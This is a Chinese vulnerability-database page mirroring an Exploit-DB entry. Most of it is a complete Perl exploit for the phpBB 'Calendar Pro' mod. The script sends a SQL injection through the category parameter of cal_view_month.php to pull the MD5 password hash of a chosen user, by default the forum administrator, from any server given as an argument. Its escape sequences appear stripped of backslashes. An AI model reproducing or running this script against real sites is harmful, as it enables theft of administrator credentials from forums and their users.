phpBB 2.0.13 – ‘Calendar Pro’ mod Get Hash-安全小百科

phpBB 2.0.13 – ‘Calendar Pro’ mod Get Hash

漏洞ID	1054993	漏洞类型
发布时间	2005-04-04	更新时间	2005-04-04
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	PHP	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/910

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

#!/usr/bin/perl -w
use IO::Socket;

##    Example:
##    C:>cal_phpbb.pl www.site.com /phpBB2/ 2
##
##    'Calendar Pro' Mod for phpBB
##    *************************
##      [~] Connecting...
##      [+] Connected!
##      [~] Sending Data...
##      [~] Data Sent, Waiting for response...
##      [+] MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055
##
if (@ARGV < 3)
{
print "nn";
print "|****************************************************************|n";
print " 'Calendar Pro' Mod <= 2.0.33 (Newest version) For phpBBn";
print " Bug found by Axln";
print " Coded by CereBrums // 4/4/2005n";
print " Usage: cal_phpbb.pl <server> <folder> <user_id>n";
print " e.g.: cal_phpbb.pl www.site.com /phpBB2/ 2 n";
print " [~] <server> - site addressn";
print " [~] <folder> - forum foldern";
print " [~] <user_id> - user id (2 is default for phpBB admin) n";
print "|****************************************************************|n";
print "nn";
exit(1);
}

$take = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "n 'Calendar Pro' Mod for phpBBn";
print " *****************************n";
print "  [~] Connecting...n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";

print "  [+] Connected!n";
print "  [~] Sending Data...n";

$path = "http://$server/";
$path .= "/$folder/";
$path .= "cal_view_month.php?month=04&year=2005&category=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_users%20where%20user_id=$user_id/*";
print $socket "GET $path HTTP/1.0rnrn";

print "  [~] Data Sent, Waiting for response...n";

while ($answer = <$socket>)
{
       if ($take == 1) {
               $in = rindex ($answer, "(");
               if ( $in > -1 ) {
                       $pass = substr($answer,$in+1,32);
                       print "  [+] MD5 Hash for user with id=$user_id is: $passn";
                       exit();
               }
       }
       if ( rindex ($answer,"cal_view_month.php?month=3&year=2005") > -1 ) {
               $take = 1;
       }
}
print "  [-] Exploit failedn";

#### EOF ####

# milw0rm.com [2005-04-04]

相关推荐: NT RPC CPU Utilization Vulnerability

NT RPC CPU Utilization Vulnerability 漏洞ID 1105077 漏洞类型 Unknown 发布时间 1997-02-07 更新时间 1997-02-07 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A CVS…

文章版权归作者所有，未经允许请勿转载。

THE END